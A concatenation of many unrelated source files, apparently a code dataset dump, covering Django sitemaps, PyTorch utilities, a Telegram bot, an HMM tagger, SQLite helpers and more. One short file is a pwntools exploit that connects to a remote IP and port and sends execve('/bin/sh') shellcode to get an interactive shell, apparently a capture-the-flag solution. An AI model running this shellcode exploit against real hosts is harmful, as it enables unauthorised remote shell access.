articles = module.render_article_list(context, None, False)
if articles == None:
continue
self.get_article_list(module, articles)
# Featured Article List Modules
featured_article_list_module = Module.objects.filter(page_id=page.id,
module_type='featured-article-list', is_deleted=False,
is_published=True)
if featured_article_list_module:
context = {}
context['request'] = request
context['parameters'] = None
for module in featured_article_list_module:
sub_modules = list(module.sub_modules.all())
for smodule in sub_modules:
if smodule.url_parameter != '':
continue
if smodule.link_to == '':
continue
smodule.is_cached = False
articles = smodule.render_article_list(context, None, False)
if articles == None:
continue
self.get_article_list(smodule, articles)
return self.all_pages
sitemaps = {
"website": LatestNews
}
return sitemap_views.sitemap(request, sitemaps, None, 'websites/' + subdomain + '/sitemaps/latestnews.html')
# EditorPick's Sitemap
@cache_page(1 * 60 * 60)
def editorspicks(request, subdomain):
class EditorPicksSitemap(WebsiteSitemap):
subdomain = request.website.subdomain
def items(self):
articles = Article.objects.filter(website_id=request.website.id, is_published=True).all()
url_format = '/newsarticle/:articleId/:articleTitle'
for article in articles:
if not article.guid:
continue
link = url_format.replace(":articleId", article.guid)
link = link.replace(":articleTitle", slugify(article.title))
article.location = link
self.all_pages.append(article)
return self.all_pages
sitemaps = {
"website": EditorPicksSitemap
}
return sitemap_views.sitemap(request, sitemaps, None,
'websites/' + subdomain + '/sitemaps/editorpicks.html')
|
23,564 | b272b807c601d048f28e536541cf5bd25b4e3a96 | import torch
import numpy as np
DEFAULT_HEIGHT = 128
DEFAULT_WIDTH = 128
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
coord = torch.zeros([1, 2, DEFAULT_HEIGHT, DEFAULT_WIDTH])
for i in range(DEFAULT_HEIGHT):
for j in range(DEFAULT_WIDTH):
coord[0, 0, i, j] = i / (DEFAULT_HEIGHT - 1.)
coord[0, 1, i, j] = j / (DEFAULT_WIDTH - 1.)
coord = coord.to(device)
def decode(delta_params, curr_params):
"""
Transition: (delta_params, curr_params) -> new canvas after action x
:param delta_params: action, i.e. delta parameters, shape = (N, frameskip (1) * action_dim (2))
:param partial_state: (canvas, curr_params), shape = (N, 6, 128, 128)
- canvas shape = (N, 3, 128, 128)
- current parameter shape = (N, 2, 128, 128)
- timestep shape = (N, 1, 128, 128)
:return: new partial state, shape = (N, 6, 128, 128)
"""
expanded_x = delta_params.unsqueeze(-1).unsqueeze(-1).expand_as(curr_params)
next_params = curr_params + expanded_x # shape = (N, 2, 128, 128)
next_canvas, _, __ = generate_quadratic_heatmap(next_params[:, :, 0, 0]) # shape = (N, 3, 128, 128)
next_canvas = next_canvas.reshape(-1, 3, DEFAULT_HEIGHT, DEFAULT_WIDTH)
normalized_next_canvas = next_canvas.float() / 255.0
return normalized_next_canvas, next_params
def generate_quadratic_heatmap(batch_parameters, img_height=DEFAULT_HEIGHT, img_width=DEFAULT_WIDTH, return_params=False):
"""
Generate quadratic heatmap z = (x - centre_x)^2 + (y - centre_y)^2
:param batch_parameters: shape = (N, 2). Batched (centre_x, centre_y)
- centre_x: float, in range [0, img_height)
- centre_y: float, in range [0, img_width)
:param img_height: integer
:param img_width: integer
:param return_params: boolean, whether or not return the centre used to generate data
:return: numpy array, shape [img_height, img_width, 3 (channels)],
optinal return: centre_x and centre_y
"""
# if batch_parameters is None:
# centre_x, centre_y = get_initialization(img_height, img_width)
batch_size = batch_parameters.shape[0]
centre_x = batch_parameters[:, 0].unsqueeze(-1).unsqueeze(-1).expand(batch_size, img_height, img_width)
centre_y = batch_parameters[:, 1].unsqueeze(-1).unsqueeze(-1).expand(batch_size, img_height, img_width)
# arr = torch.zeros([batch_size, img_height, img_width])
expanded_coord_x = coord[:, 0, :, :].expand(batch_size, img_height, img_width)
expanded_coord_y = coord[:, 1, :, :].expand(batch_size, img_height, img_width)
# Compute heat map
arr = (expanded_coord_x - centre_x) ** 2 + (expanded_coord_y - centre_y) ** 2
# Cast to uint8
arr = (arr * 255).byte()
# Copy the array across all three channels
arr = arr.unsqueeze(-1).expand(batch_size, img_height, img_width, 3)
if return_params:
return arr, centre_x, centre_y
return arr, None, None
def get_initialization(batch_size, img_height=DEFAULT_HEIGHT, img_width=DEFAULT_WIDTH):
centre_x = torch.from_numpy(np.random.uniform(0, 1, size=(batch_size, 1))).float()
centre_y = torch.from_numpy(np.random.uniform(0, 1, size=(batch_size, 1))).float()
initial_params = torch.cat((centre_x, centre_y), 1)
return initial_params
|
23,565 | 16b176c1f8b3c6f73204707259a94b6e9a637474 | # Import libs
import pandas as pd
from matplotlib import pyplot as plt
from scipy.cluster import hierarchy
import numpy as np
# Read in the dataset
# Drop any fields that are strings
# Only get the first 40 because this dataset is big
df = pd.read_csv('Pokemon.csv')
df = df.set_index('Name')
del df.index.name
df = df.drop(["Type 1", "Type 2", "Legendary"], axis=1)
df = df.head(n=40)
# Calculate the distance between each sample
Z = hierarchy.linkage(df, 'ward')
# Orientation our tree
hierarchy.dendrogram(Z, orientation="left", labels=df.index)
plt.show() |
23,566 | 77c3fffbeba7584253a72cc25e2f1f8798dab2d3 | from __future__ import absolute_import, unicode_literals
import logging
from products.models import MainProductsCategorie, ProductsSubCategorie, Product
from django.urls import reverse
from celery import shared_task
import telebot
@shared_task
def telegramRegister(token):
bot = telebot.TeleBot(token)
@bot.message_handler(commands=['start'])
def send_welcome(message):
mpc = MainProductsCategorie.objects.all()
psc = ProductsSubCategorie.objects.all()
output = 'Доступные категории:\n'
for mc in mpc:
output += mc.name + "\n\n"
for sc in psc:
if sc.parent == mc:
output += sc.name + "\n"
bot.reply_to(message, output)
@bot.message_handler(commands=['category'])
def send_products_by_category(message):
cat = message.text.split('/category ')
try:
psc = ProductsSubCategorie.objects.get(name = cat[1])
except ProductsSubCategorie.DoesNotExist:
bot.reply_to(message, "Такую категорию ещё не придумали:(")
return
products = Product.objects.filter(category = psc)
output = 'Вот что я нашёл:\n\n'
for product in products:
output+= product.name + "\n" + product.description + "\n" + str(product.price) + "\n\n"
bot.reply_to(message, output)
bot.polling()
|
23,567 | 1acf6182a1a21fe9c2228f9b033d24435db54bd5 | #!/usr/bin/python
import sys
import os
if len(sys.argv) >= 4 :
ref_jun_filename = sys.argv[1]
tag_gpd_filename = sys.argv[2]
output_filename = sys.argv[3]
else:
print("usage: python ~/3seq/juncover.py ref_jun.bed target.gpd")
print("or ~/3seq/juncover.py ref_jun.bed target.gpd")
sys.exit(1)
################################################################################
ref_jun=open(ref_jun_filename,'r')
ref_jun_dt = {}
for line in ref_jun:
if line[0:5]=='track':
continue
else:
line_list=line.strip().split("\t")
chr_name = line_list[0]
thickness=line_list[10].split(',')
leftpos=str(int(line_list[1])+int(thickness[0]))
rightpos=str(int(line_list[2])-int(thickness[1]))
locus = chr_name + ":" + leftpos + "_" +rightpos
if not ref_jun_dt.has_key(locus):
ref_jun_dt[locus] = 0
ref_jun_dt[locus] += 1
ref_jun.close()
################################################################################
gpd = open(tag_gpd_filename,'r')
output = open(output_filename + ".bed",'w')
for refline in gpd:
refline_list=refline.split()
Exon_start=int(refline_list[4])
Exon_end=int(refline_list[5])
Exon_start_list=refline_list[9].strip(",").split(',')
Exon_end_list=refline_list[10].strip(",").split(',')
strand=refline_list[3]
chr_name = refline_list[2]
j = 1
jun_start_ls = []
jun_end_ls = []
for jun_start in Exon_end_list[:-1]:
jun_start_ls.append(jun_start)
jun_end = Exon_start_list[j]
jun_end_ls.append(jun_end)
j += 1
j=0
I = 0
for start in jun_start_ls:
end=jun_end_ls[j]
locus = chr_name + ":" + start + "_" + end
if ref_jun_dt.has_key(locus):
I += 1
else:
jun_start = int(start)
jun_end = int(end)
output_ls = [chr_name,str(jun_start-50),str(jun_end+50),"LR_covered_jun","50","+",str(jun_start-50),str(jun_end+50),"0,0,0","2","50,50"]
jun_L = jun_end - jun_start - 50
output_ls.append("0,"+str(jun_L))
output.write( "\t".join(output_ls) +'\n')
j+=1
if I == len(jun_start_ls):
print refline.strip()
gpd.close()
################################################################################
output.close()
|
23,568 | b7f469283e98cdb1c5987f88a3b8559b451f1fdd | from pwn import *
import time
#r = process("./5cm")
r = remote('125.235.240.168', 27019)
raw_input("?")
payload = "\x0F\x05"
r.send(payload)
time.sleep(2)
payload = "\x90\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
r.sendline(payload)
r.interactive()
|
23,569 | 4cddf56128e31b2c01dbe84a8a2fd153552ecdbb | #!/usr/bin/env python3
# coding=utf-8
import sqlite3
import os
import platform
import tempfile
from .ConstantesBaseDatosSQLite import *
class GestorBD(object):
def __init__(self, archivo_db):
self.debug=False
self.archivo_db=archivo_db
self.conexion=sqlite3.connect(self.archivo_db)
self.cursor=self.conexion.cursor()
self.ejecutar_sentencias(["PRAGMA foreign_keys=ON"])
@staticmethod
def get_preludio_sql(nombre_funcion):
return PRELUDIO_SQL.format(nombre_funcion)
@staticmethod
def crear_sentencia_update(sentencia):
sql="\tsql=\""+sentencia+"\"\n"
sql+="\tdb.Execute sql, dbFailOnError\n"
return sql
def crear_tabla_itinerancias(self, nombre_tabla=NOMBRE_TABLA_ITINERANCIAS):
self.ejecutar_sentencias(
[
SQL_CREACION_PLANTILLAS.format ( nombre_tabla )
]
)
@staticmethod
def get_procedimiento(nombre, sql_intermedio):
inicio=GestorBD.get_preludio_sql(nombre)
fin=GestorBD.get_fin_sql()
return inicio+sql_intermedio+fin
@staticmethod
def get_fin_sql():
return FIN_SQL_ACCESS
def activar_depuracion(self):
self.debug=True
def desactivar_depuracion(self):
self.debug=False
def get_unico_valor(self, sql_con_valor_unico):
if self.debug:
print (sql_con_valor_unico)
filas=self.get_filas(sql_con_valor_unico)
#print(filas)
return filas[0][0]
def ejecutar_sentencias(self, lista_sentencias):
for sql in lista_sentencias:
if self.debug:
print("-"*20)
print (sql)
print("-"*20)
try:
self.cursor.execute(sql)
except:
print("Fallo la sentencia siguiente:")
print(sql)
self.conexion.commit()
def get_filas(self, select):
filas=self.cursor.execute(select)
return filas.fetchall()
def cuantos_cumplen_select(self, select):
filas=self.get_filas(select)
return len(filas)
def __del__(self):
self.cursor.close()
def get_descripcion(self):
return self.cursor.description
def get_nombres_columnas(self):
descripciones=self.cursor.description
nombres_columnas=[]
for d in descripciones:
nombres_columnas.append ( d[0] )
return nombres_columnas
def extraer_tuplas_especialidades_de_fichero(self, nombre_fichero):
fichero=open(nombre_fichero, encoding="utf-8")
lineas=fichero.readlines()
tuplas=[]
for l in lineas:
codigo=l[0:3]
descripcion=l[4:].strip()
tuplas.append( ( codigo, descripcion ) )
fichero.close()
return tuplas
def crear_tabla_todas_especialidades(self, nombre_tabla_especialidades):
sql=SQL_CREACION_ESPECIALIDADES.format(nombre_tabla_especialidades)
self.ejecutar_sentencias([sql])
ficheros=["590", "591", "592", "594", "595", "596", "597"]
for f in ficheros:
self.crear_tabla_especialidades(f, nombre_tabla_especialidades)
def crear_tabla_especialidades(self, codigo_cuerpo, nombre_tabla_especialidades):
f=codigo_cuerpo
sql=[]
dir_actual=os.path.dirname(os.path.realpath(__file__))
ruta_fichero=dir_actual+os.path.sep+"Especialidades0{0}.txt".format(f)
especialidades=self.extraer_tuplas_especialidades_de_fichero( ruta_fichero )
for tupla in especialidades:
codigo=tupla[0]
nombre=tupla[1]
# Codigo Nombre Idioma ¿tiempo parcial?
insert="insert or ignore into especialidades values ('0{2}{0}', '{1}', 'ESPAÑOL', 'NO')".format(codigo, nombre, f)
sql.append(insert)
# Codigo Nombre Idioma ¿tiempo parcial?
insert="insert or ignore into especialidades values ('P{2}{0}', '{1}', 'ESPAÑOL', 'SI')".format(codigo, nombre, f)
sql.append(insert)
# Codigo Nombre Idioma ¿tiempo parcial?
insert="insert or ignore into especialidades values ('B{2}{0}', '{1}', 'INGLÉS', 'NO')".format(codigo, nombre, f)
sql.append(insert)
# Codigo Nombre Idioma ¿tiempo parcial?
insert="insert or ignore into especialidades values ('W{2}{0}', '{1}', 'INGLÉS', 'SI')".format(codigo, nombre, f)
sql.append(insert)
# Codigo Nombre Idioma ¿tiempo parcial?
insert="insert or ignore into especialidades values ('R{2}{0}', '{1}', 'FRANCÉS', 'SI')".format(codigo, nombre, f)
sql.append(insert)
# Codigo Nombre Idioma ¿tiempo parcial?
insert="insert or ignore into especialidades values ('F{2}{0}', '{1}', 'FRANCÉS', 'NO')".format(codigo, nombre, f)
sql.append(insert)
self.ejecutar_sentencias(sql)
def get_sql_especialidades(self):
sql=[]
insert_primaria="insert or ignore into especialidades values ('PRIMARIA', 'DESCONOCIDA', 'ESPAÑOL', 'NO')"
sql.append(insert_primaria)
insert_secundaria="insert or ignore into especialidades values ('SECUNDARIA', 'DESCONOCIDA', 'ESPAÑOL', 'NO')"
sql.append(insert_secundaria)
ficheros=["590", "591", "592", "594", "595", "596", "597"]
for f in ficheros:
self.crear_tabla_especialidades(f, "especialidades")
return sql
def crear_tablas_iniciales_en_bd(self):
self.ejecutar_sentencias(["PRAGMA foreign_keys=ON"])
self.ejecutar_sentencias(["PRAGMA foreign_keys=ON"])
self.crear_tabla_todas_especialidades("especialidades")
self.ejecutar_sentencias([ SQL_CREACION_NOMBRAMIENTOS ])
self.ejecutar_sentencias ( BD_RESULTADOS.get_sql_especialidades() )
def cambiar_nombres_por_codigos(self, nombre_tabla_rutas, nombre_tabla_localidades):
sql_localidades="select nombre_localidad from {0}".format ( nombre_tabla_localidades )
if self.debug:
print (sql_localidades)
filas_localidades=self.get_filas ( sql_localidades )
sql_extractor_codigo="select codigo_localidad from {0} where nombre_localidad='{1}'"
sentencias_update=[]
for localidad in filas_localidades:
codigo_localidad=self.get_unico_valor ( sql_extractor_codigo.format(
nombre_tabla_localidades, localidad[0]
), 'codigo_localidad')
sql_update="update {0} set origen='{1}' where origen='{2}'".format (
nombre_tabla_rutas, codigo_localidad, localidad[0]
)
sentencias_update.append(sql_update)
sql_update="update {0} set destino='{1}' where destino='{2}'".format (
nombre_tabla_rutas, codigo_localidad, localidad[0]
)
sentencias_update.append(sql_update)
excepciones=[
("130360002", "Cortijos de Arriba"),
("130360002", "Cortijo de Arriba"),
]
for tupla in excepciones:
codigo_localidad=tupla[0]
localidad=tupla[1]
sql_update="update {0} set origen='{1}' where origen='{2}'".format (
nombre_tabla_rutas, codigo_localidad, localidad
)
sentencias_update.append(sql_update)
sql_update="update {0} set destino='{1}' where destino='{2}'".format (
nombre_tabla_rutas, codigo_localidad, localidad
)
sentencias_update.append(sql_update)
self.ejecutar_sentencias(sentencias_update)
|
23,570 | 333c78752cb6391457553a1bfc0060ac57d7cec9 | # -*- coding: utf-8 -*-
#################################################
# SVM: support vector machine
# Author : zouxy
# Date : 2013-12-12
# HomePage : http://blog.csdn.net/zouxy09
# Email : zouxy09@qq.com
#################################################
from numpy import *
import AI.svm as SVM; reload(SVM);
################## test svm #####################
## step 1: load data
print "step 1: load data..."
dataSet = TrainData
labels = TrainTag
training_count=200
dataSet = mat(TrainData)
labels = mat(TrainTag).T
train_x = dataSet[:training_count, :]
train_y = labels[:training_count, :]
test_x = dataSet[:, :]
test_y = labels[:, :]
## step 2: training...
print "step 2: training..."
'''
C = 100
toler = 0.1
maxIter = 1000
svmClassifier = SVM.trainSVM(train_x, train_y, C, toler, maxIter, kernelOption = ('rbf', 99999)) #'rbf or linear'
'''
C = 0.6
toler = 0.001
maxIter = 500
svmClassifier = SVM.trainSVM(train_x, train_y, C, toler, maxIter, kernelOption = ('linear', 0))
#'''
## step 3: testing
print "step 3: testing..."
accuracy,pred = SVM.testSVM(svmClassifier, test_x, test_y)
## step 4: show the result
print "step 4: show the result..."
print 'The classify accuracy is: %.3f%%' % (accuracy * 100)
SVM.showSVM(svmClassifier)
|
23,571 | 270804ac50cb74441162253f03a9958641696d6b | """empty message
Revision ID: 4bbfdf089fbc
Revises: 2cc431e5815b
Create Date: 2014-01-07 23:46:14.694649
"""
# revision identifiers, used by Alembic.
revision = '4bbfdf089fbc'
down_revision = '2cc431e5815b'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
def upgrade():
op.add_column('membership', sa.Column('allows_management', sa.Boolean(), nullable=False))
op.alter_column('membership', 'project_id',
existing_type=mysql.INTEGER(display_width=11),
nullable=False)
op.alter_column('membership', 'user_id',
existing_type=mysql.INTEGER(display_width=11),
nullable=False)
def downgrade():
op.alter_column('membership', 'user_id',
existing_type=mysql.INTEGER(display_width=11),
nullable=True)
op.alter_column('membership', 'project_id',
existing_type=mysql.INTEGER(display_width=11),
nullable=True)
op.drop_column('membership', 'allows_management')
|
23,572 | 78877dca167b9c0b337216f8a67b5383dcb637d1 | import utils
import logging
import collections
from itertools import islice
from optparse import OptionParser
def create_model_viterbi_only(sentences):
model = collections.defaultdict(lambda: collections.defaultdict(int))
for sentence in sentences:
for token in sentence:
model[token.word][token.tag] += 1
return model
def predict_tags_viterbi_only(sentences, model):
for sentence in sentences:
for token in sentence:
max = 0
for key, value in model[token.word].items():
if value > max:
max = value
winner = key
token.tag = winner
return sentences
# Splitting data into tags and tokens
class Token:
def __init__(self, word, tag):
self.word = word
self.tag = tag
def __str__(self):
return "%s/%s" % (self.word, self.tag)
# Creating Python Dictionaries for Sentences and Words
def create_model(sentences):
tag_a = collections.defaultdict(int) # tag_a = unigram
tag_b = collections.defaultdict(
lambda: collections.defaultdict(int)) # tag_b = bigrams
tag_words = collections.defaultdict(lambda: collections.defaultdict(int))
for sentence in sentences: # Updating counts of unigrams, tags and words, and tag bigrams
# Temporarily inserting a sentence-start character so we can count words at beginning of sentence.
sentence.insert(0, Token('', '<s>'))
for i, token in enumerate(sentence, 0):
tag_a[token.tag] += 1 # Unigrams
tag_words[token.tag][token.word] += 1 # Tags and words
if (i+1) < len(sentence): # Tag bigrams
tag_b[token.tag][sentence[i+1].tag] += 1
# Removing our sentence-start token again.
sentence.pop(0)
# Defining dictionaries into which to populate probabilities of all delicious Viterbi ingredients
transition = collections.defaultdict(lambda: collections.defaultdict(int))
emission = collections.defaultdict(lambda: collections.defaultdict(int))
# Calculating transition probabilities
for i, item in enumerate(tag_b.items(), 0):
org = item[0]
bi = item[1].items()
count_1 = tag_a.items()[i][1]
for n in bi:
count_2 = n[1]
prob = (float(count_2)+1) / (float(count_1)+45)
n = n[0]
transition[org][n] = prob
# Calculating emission probabilities
for i, item in enumerate(tag_words.items(), 0):
org = item[0]
bi = item[1].items()
count_1 = tag_a.items()[i][1]
for n in bi:
count_2 = n[1]
prob = float(count_2) / float(count_1)
n = n[0]
emission[org][n] = prob
# print(emission)
model = transition, emission # Passing both back to our model
return model
def predict_tags(sentences, model):
tagset = ['NN', 'CC', 'CD', 'DT', 'EX', 'FW', 'IN', 'JJ', 'JJR', 'JJS', 'LS', 'MD', 'NNS', 'NNP', 'NNPS', 'PDT', 'POS', 'PRP', 'PRP$', 'RB', 'RBR',
'RBS', 'RP', 'SYM', 'TO', 'UH', 'VB', 'VBD', 'VBN', 'VBP', 'VBG', 'VBZ', 'WDT', 'WP', 'WP$', 'WRB', '.', ',', '``', "''", ')', '(', '$', ':', '#']
final = 0
for sentence in sentences:
# Grabbing a list of words in sentence.
words = [token.word for token in sentence]
viterbi = {} # Creating the blank dictionary for this sentence.
for t in tagset:
# Creating the matrix with a width of len(sentence)
viterbi[t] = [0] * len(sentence)
for i, word in enumerate(words, 0): # Looping through the sentence
v = 0
for t in tagset:
# Grabbing the correct emission probability for word given t
em_prob = model[1][t][word]
if em_prob == 0: # Taking care of unseen words in testing, part 1
em_prob = float(0.0000001)
marker_t = ''
baseline = 0
for tag in tagset:
# Grabbing the correct transition probability for current tag "t" given each previous tag "tag"
tr_prob = model[0][tag][t]
# If it's the first word in the sentence, we calculate differently.
if i == 0:
tr_prob = model[0]['<s>'][t]
consider = em_prob * tr_prob
if i >= 1: # For all subsequent words
prev = viterbi[tag][i-1][0]
consider = em_prob * tr_prob * prev
if (consider > baseline):
baseline = consider
marker_t = t
if baseline > v:
v = baseline
final = marker_t
# Update your Viterbi cell here after getting the max!!
viterbi[t][i] = (baseline, marker_t)
if i == len(sentence)-1:
# Save the final tag so we can add it to our taglist.
sentence[i].tag = final
###########################################
tags = [] # Starting our backpointer method
m = 0
tag = ''
for i in range((len(sentence)-1), -1, -1): # Iterating backward through the list
# Appending the last tag in the sentence to our list
if i == (len(sentence)-1):
tags.append(sentence[i].tag)
else: # For all subsequent words, working backwards
for t in tagset:
temp = viterbi[t][i][0]
if temp != 0:
if viterbi[t][i][0] > m:
m = viterbi[t][i][0]
tag = viterbi[t][i][1]
# If we originally had "blank" values - for unknown words.
if m == 0:
for t in tagset:
if viterbi[t][i][1] != '':
tag = viterbi[t][i][1]
# Add the final tag value to our reversed list
tags.append(tag)
tags.reverse() # Reversing the list from R-L to L-R
for i in range(len(sentence)):
# Zipping the taglist back up to the sentence
sentence[i].tag = tags[i]
return sentences
if __name__ == "__main__":
usage = "usage: %prog [options] GOLD TEST"
parser = OptionParser(usage=usage)
parser.add_option("-d", "--debug", action="store_true",
help="turn on debug mode")
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error("Please provide required arguments")
if options.debug:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.CRITICAL)
training_file = args[0]
training_sentences = utils.read_tokens(training_file)
test_file = args[1]
test_sentences = utils.read_tokens(test_file)
model = create_model(training_sentences)
model_viterbi_only = create_model_viterbi_only(training_sentences)
# read sentences again because predict_tags_viterbi_only(...) rewrites the tags
sents = utils.read_tokens(training_file)
predictions = predict_tags_viterbi_only(sents, model_viterbi_only)
accuracy = utils.calc_accuracy(training_sentences, predictions)
print "Accuracy in training [%s sentences] with Viterbi only : %s " % (
len(sents), accuracy)
# read sentences again because predict_tags_viterbi_only(...) rewrites the tags
sents = utils.read_tokens(test_file)
predictions = predict_tags_viterbi_only(sents, model_viterbi_only)
accuracy = utils.calc_accuracy(test_sentences, predictions)
print "Accuracy in testing [%s sentences] with Viterbi only : %s " % (
len(sents), accuracy)
# read sentences again because predict_tags(...) rewrites the tags
sents = utils.read_tokens(training_file)
predictions = predict_tags(sents, model)
accuracy = utils.calc_accuracy(training_sentences, predictions)
print "Accuracy in training [%s sentences] with HMM and Viterbi : %s " % (
len(sents), accuracy)
# read sentences again because predict_tags(...) rewrites the tags
sents = utils.read_tokens(test_file)
predictions = predict_tags(sents, model)
accuracy = utils.calc_accuracy(test_sentences, predictions)
print "Accuracy in testing [%s sentences] with HMM and Viterbi : %s " % (
len(sents), accuracy)
|
23,573 | d9b52f25459a314ad1d34fc4cab6740683cbd607 | '''
用类和面向对象的思想,“描述”生活中任意接触到的东西(比如动物、小说里面的人物,不做限制,随意发挥),数量为5个。
-- by celia 2020.08.09
'''
class Country:
# 用__slots__ 限制实例的属性,只允许对country实例添加如下的属性
__slots__ = ("country","name","consistent","language","city")
# 构造函数自动调用,传入country值
def __init__(self, country):
self.country = country
print(f"Human beings live on the earth, here describes country : {country}")
def test(self):
pass
def Fname(self, name):
self.name = name
if name == 'China':
print(f"{self.country}'s authority name is :the People's Republic of China")
else:
print(f"{self.country}'s authority name is :{name}")
def where(self, consistent):
self.consistent = consistent
print(f"{self.country} belongs to {consistent}")
def speak(self, language):
self.language = language
print(f"People in {self.country} speak {language}")
def capital(self, city):
self.city = city
print(f"{self.country}'s capital is {city}")
China = Country('China')
China.Fname("China")
China.where('Aisa')
China.speak('Chinese')
China.capital("Beijing\n")
US = Country("US")
US.Fname("United States of America")
US.where('North America')
US.speak('English')
US.capital("Washington\n")
UK = Country("UK")
UK.Fname("The United Kingdom of Great Britain and Northern Ireland")
UK.where('Europe')
UK.speak("English")
UK.capital("London\n")
Russia = Country("Russia")
Russia.Fname("Russian Federation")
Russia.where("Europe")
Russia.speak("Russian")
Russia.capital("Moscow\n")
Germany = Country("Germany")
Germany.Fname("The Federal Republic of Germany or Moral Country")
Germany.where("Europe")
Germany.speak("German")
Germany.capital("Berlin\n")
|
23,574 | a13b4dd0caa2f1e2ee1c1f09fa95e957f12a3cf1 | import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint
from tensorflow.keras.utils import to_categorical
import numpy as np
from lib import data, models
# Create a CNN model trained on mnist - used for the evaluation of generative models on stacked mnist e.g. by mode counting
(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()
train_images = train_images.reshape(train_images.shape[0], 28, 28, 1).astype('float32')
train_images = (train_images - 127.5) / 127.5 # Normalize the images to [-1, 1]
test_images = (test_images - 127.5) / 127.5 # Normalize the images to [-1, 1]
train_labels = to_categorical(train_labels)
test_labels = to_categorical(test_labels)
train_images = np.reshape(train_images,(-1,28,28,1))
test_images = np.reshape(test_images,(-1,28,28,1))
cnn = models.mnist_cnn()
optimizer = tf.keras.optimizers.Adam(learning_rate=1e-4)
cnn.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
checkpoint_path = 'data/cnn_model_checkpoint.hdf5'
earlyStopping = EarlyStopping(monitor='val_loss', patience=5, mode='min')
mcp_save = ModelCheckpoint(checkpoint_path, save_best_only=True, monitor='val_loss', mode='min')
cnn.fit(train_images, train_labels, validation_data=(test_images,test_labels), callbacks=[earlyStopping, mcp_save],
batch_size=32, epochs=100, verbose=2)
cnn.load_weights(checkpoint_path)
eval_out = cnn.evaluate(test_images, test_labels)
print(eval_out)
|
23,575 | c8930264e6fa9e738e78583962729626763cd723 | # -*- coding:utf-8; -*-
class Solution:
""" 动态规划
"""
def climbStairs(self, n: int) -> int:
if n < 3:
return n
f1, f2, f3 = 1, 2, 3
for i in range(3, n + 1): # 注意这里为什么是n+1
f3 = f1 + f2
f1 = f2
f2 = f3
return f3
class Solution:
""" 递归算法,但是提示超时
"""
def climbStairs(self, n):
if n < 3:
return n
return self.climbStairs(n - 1) + self.climbStairs(n - 2)
|
23,576 | b2092b601beb7f0dc2ab50cb703fcb477b1ad3e3 | import model, nnarchs, zdata, content, utilz, preprocess, extract, report
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# from torch.utils.data import Dataset, DataLoader
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler, PowerTransformer , OneHotEncoder
from sklearn.linear_model import LogisticRegression
from sklearn import svm
if __name__ == "__main__":
c = "="
report.ZReporter.start("Vessels_Segmentation")
pdstats = zdata.PdDataStats(
{zdata.PdDataStats.DATA_DICT_RECORDZ_KEY: content.CHASEDB_FUNDUS_CONTENT_FPATH,
zdata.PdDataStats.DATA_DICT_HAS_HEADERZ_KEY: True,
'rec_parser': utilz.FileIO.row_parser
},
ftype=zdata.PdDataStats.TYPE_TXT_LINES_FILE )
#pdstats.dframe
### =============
X_data = pdstats.dframe
y_data = pdstats.dframe['i-L/R']
### =============== Pipeline
# load image file --> preproc: equalize hist, --> proc: color channelz,
## 1. preprocessing = load, rescale, crop
preproc_pipe = [('load_file', preprocess.LoadImageFileTransform('fpath', resize=(105,105), crop_ratio=0.97)), ]
## 2. postprocessing = morphological seal, median smooth noise +++ reshape: flatten for SVM etc
postproc_pipe = []
## 3. process permutaitons = color channels sep (Lab @ ry combo) ||
color_c_pipe = [('color_channelz', extract.ColorChannelz())]
data_pipez = [Pipeline(preproc_pipe + color_c_pipe + postproc_pipe)]
model_pipez = [ ( Pipeline([ ('flatten', preprocess.Flattenor()), ('svm', svm.SVC() ) ]), {'kernel':('linear', 'rbf'), 'C':[1, 10]}) , ##
( Pipeline([ ('flatten', preprocess.Flattenor()),('logit', LogisticRegression() ) ]), {'C':[1,10]} ), ##
]
# print( dpipez)
mgr = model.ZTrainingManager()
mgr.build_permutationz(data_pipez=data_pipez, model_pipez=model_pipez)
mgr.run( X_data , y_data, train_test_split=1.)
print(f"{c*10} End ZTrainingManager {c*10}\n")
|
23,577 | e1d5f674451087336a650998cbc767f8bfdf5fc6 | import subprocess
import os
import re
import pwd
from datetime import timedelta
from time import sleep
from ops.model import ModelError
from ops.charm import CharmEvents
from ops.framework import (
Object,
StoredState,
EventBase,
EventSource,
)
from jinja2 import Environment, FileSystemLoader
class ClusterInitializedEvent(EventBase):
def __init__(self, handle, cluster_id):
super().__init__(handle)
self.cluster_id = cluster_id
def snapshot(self):
return self.cluster_id
def restore(self, cluster_id):
self.cluster_id = cluster_id
class DaemonStartedEvent(EventBase):
"""Emitted when a database daemon is started by the charm."""
class DbInstanceManagerEvents(CharmEvents):
daemon_started = EventSource(DaemonStartedEvent)
cluster_initialized = EventSource(ClusterInitializedEvent)
class DbInstanceManager(Object):
"""Responsible for managing machine state related to a database instance."""
on = DbInstanceManagerEvents()
_stored = StoredState()
COCKROACHDB_SERVICE = 'cockroachdb.service'
SYSTEMD_SERVICE_FILE = f'/etc/systemd/system/{COCKROACHDB_SERVICE}'
WORKING_DIRECTORY = '/var/lib/cockroach'
COCKROACH_INSTALL_DIR = '/usr/local/bin'
COCKROACH_BINARY_PATH = f'{COCKROACH_INSTALL_DIR}/cockroach'
COCKROACH_USERNAME = 'cockroach'
MAX_RETRIES = 10
RETRY_TIMEOUT = timedelta(milliseconds=125)
def __init__(self, charm, key, is_single_node, cluster):
super().__init__(charm, key)
self._stored.set_default(is_started=False)
self._stored.set_default(is_initialized=False)
self._is_single_node = is_single_node
self._cluster = cluster
def install(self):
self._install_binary()
self._setup_systemd_service()
def _install_binary(self):
"""Install CockroachDB from a resource or download a binary."""
try:
resource_path = self.model.resources.fetch('cockroach-linux-amd64')
except ModelError:
resource_path = None
if resource_path is None:
architecture = 'amd64' # hard-coded until it becomes important
version = self.model.config['version']
cmd = (f'wget -qO- https://binaries.cockroachdb.com/'
f'cockroach-{version}.linux-{architecture}.tgz'
f'| tar -C {self.COCKROACH_INSTALL_DIR} -xvz --wildcards'
